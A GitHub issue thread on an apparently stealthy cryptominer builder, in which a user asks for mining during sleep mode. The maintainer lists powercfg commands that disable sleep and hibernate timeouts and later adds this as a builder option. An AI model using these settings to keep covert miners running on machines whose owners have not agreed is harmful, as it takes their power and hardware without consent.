### ISSUE TITLE
mining in sleep mode

### ISSUE THREAD

**Issue by 1aminov** [UnamSanctam/SilentCryptoMiner#421]
is it possible to add a mining function in windows sleep mode?
or make it so that the pc does not go to sleep

**Comment by UnamSanctam** [comment]
During sleep mode all programs are suspended so the miner can't run during that (and neither can anything else), there are multiple different types of sleep mode so if you were to truly disable it you would probably have to disable all the different kinds with something like these commands:
```
powercfg /x -hibernate-timeout-ac 0
powercfg /x -hibernate-timeout-dc 0
powercfg /x -disk-timeout-ac 0
powercfg /x -disk-timeout-dc 0
powercfg /x -monitor-timeout-ac 0
powercfg /x -monitor-timeout-dc 0
powercfg /x -standby-timeout-ac 0
powercfg /x -standby-timeout-dc 0
```

**Comment by 1aminov** [comment]
@UnamSanctam Is it possible to add disabling these modes to the builder? if this is not a very complex function, please add

**Comment by UnamSanctam** [comment]
Yes it's probably possible, just have to find (or make) some room where I can put the option.

**Comment by 1aminov** [comment]
@UnamSanctam I would be very grateful if you would add this and another feature that I asked for in the base builder
 https://github.com/UnamSanctam/SilentCryptoMiner/issues/84

**Comment by UnamSanctam** [comment]
This has been added as an option in the newest version (except disk and monitor timeout since they aren't really needed).
